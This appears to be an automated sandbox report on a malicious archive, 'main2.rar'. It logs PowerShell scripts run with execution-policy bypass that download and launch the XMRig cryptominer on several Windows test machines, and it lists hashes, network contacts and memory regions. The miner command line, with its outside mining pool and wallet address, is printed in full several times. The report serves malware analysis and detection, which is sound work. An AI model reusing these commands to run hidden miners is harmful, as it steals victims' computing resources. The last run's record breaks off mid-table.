Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-22 20:12
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
294s
Max time network
302s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3320 wrote to memory of 4000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3320 wrote to memory of 4000 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
memory/3320-0-0x00007FFB96663000-0x00007FFB96665000-memory.dmp
memory/3320-1-0x0000018DB51B0000-0x0000018DB51D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ofaevxms.uce.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3320-10-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/3320-11-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/3320-12-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/3320-14-0x0000018DCD830000-0x0000018DCD842000-memory.dmp
memory/3320-15-0x0000018DB5200000-0x0000018DB520A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4000-46-0x000001760F2E0000-0x000001760F300000-memory.dmp
memory/4000-47-0x00000176A1890000-0x00000176A18B0000-memory.dmp
memory/3320-48-0x00007FFB96663000-0x00007FFB96665000-memory.dmp
memory/3320-49-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/4000-50-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/3320-51-0x00007FFB96660000-0x00007FFB97122000-memory.dmp
memory/4000-52-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-54-0x00000176A1F00000-0x00000176A1F20000-memory.dmp
memory/4000-53-0x00000176A1EE0000-0x00000176A1F00000-memory.dmp
memory/4000-55-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-56-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-57-0x00000176A1EE0000-0x00000176A1F00000-memory.dmp
memory/4000-58-0x00000176A1F00000-0x00000176A1F20000-memory.dmp
memory/4000-59-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-60-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-61-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-62-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-63-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-64-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-65-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-66-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-67-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-68-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-69-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-70-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-71-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-72-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-73-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-74-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-75-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-76-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-77-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-78-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-79-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-80-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-81-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
memory/4000-82-0x00007FF63F9A0000-0x00007FF6405D3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win7-20240221-en
Max time kernel
118s
Max time network
122s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
Network
Files
memory/2880-4-0x000007FEF60DE000-0x000007FEF60DF000-memory.dmp
memory/2880-5-0x000000001B780000-0x000000001BA62000-memory.dmp
memory/2880-7-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2880-6-0x0000000002310000-0x0000000002318000-memory.dmp
memory/2880-8-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2880-9-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2880-10-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2880-11-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
295s
Max time network
255s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2168 wrote to memory of 2644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2168 wrote to memory of 2644 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
Files
memory/2168-0-0x00007FFCF84D3000-0x00007FFCF84D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xslfdsct.2g5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2168-9-0x0000029B6B1F0000-0x0000029B6B212000-memory.dmp
memory/2168-10-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-11-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-12-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-13-0x00007FFCF84D3000-0x00007FFCF84D5000-memory.dmp
memory/2168-14-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-15-0x00007FFCF84D0000-0x00007FFCF8F92000-memory.dmp
memory/2168-18-0x0000029B6B1E0000-0x0000029B6B1EA000-memory.dmp
memory/2168-17-0x0000029B6B3B0000-0x0000029B6B3C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2644-49-0x000001AB55990000-0x000001AB559B0000-memory.dmp
memory/2644-50-0x000001AB559E0000-0x000001AB55A00000-memory.dmp
memory/2644-51-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-52-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-53-0x000001AB55A20000-0x000001AB55A40000-memory.dmp
memory/2644-54-0x000001AB55A00000-0x000001AB55A20000-memory.dmp
memory/2644-55-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-56-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-59-0x000001AB55A00000-0x000001AB55A20000-memory.dmp
memory/2644-57-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-58-0x000001AB55A20000-0x000001AB55A40000-memory.dmp
memory/2644-60-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-61-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-62-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-63-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-64-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-65-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-66-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-67-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-68-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-69-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-70-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-71-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-72-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-73-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-74-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-75-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-76-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
memory/2644-77-0x00007FF761AB0000-0x00007FF7626E3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
294s
Max time network
301s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5044 wrote to memory of 2552 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5044 wrote to memory of 2552 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/5044-2-0x00007FFCAE013000-0x00007FFCAE014000-memory.dmp
memory/5044-5-0x000001E771860000-0x000001E771882000-memory.dmp
memory/5044-8-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
memory/5044-9-0x000001E771A10000-0x000001E771A86000-memory.dmp
memory/5044-10-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5q3vjdz.rdo.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5044-25-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
memory/5044-29-0x00007FFCAE013000-0x00007FFCAE014000-memory.dmp
memory/5044-30-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
memory/5044-31-0x00007FFCAE010000-0x00007FFCAE9FC000-memory.dmp
memory/5044-64-0x000001E7719F0000-0x000001E7719FA000-memory.dmp
memory/5044-51-0x000001E771B90000-0x000001E771BA2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2552-93-0x0000024242BC0000-0x0000024242BE0000-memory.dmp
memory/2552-94-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-95-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-96-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-97-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-98-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-99-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-100-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-101-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-102-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-103-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-104-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-105-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-106-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-107-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-108-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-109-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-110-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-111-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-112-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-113-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-114-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-115-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-116-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-117-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
memory/2552-118-0x00007FF6D3620000-0x00007FF6D4253000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
290s
Max time network
245s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
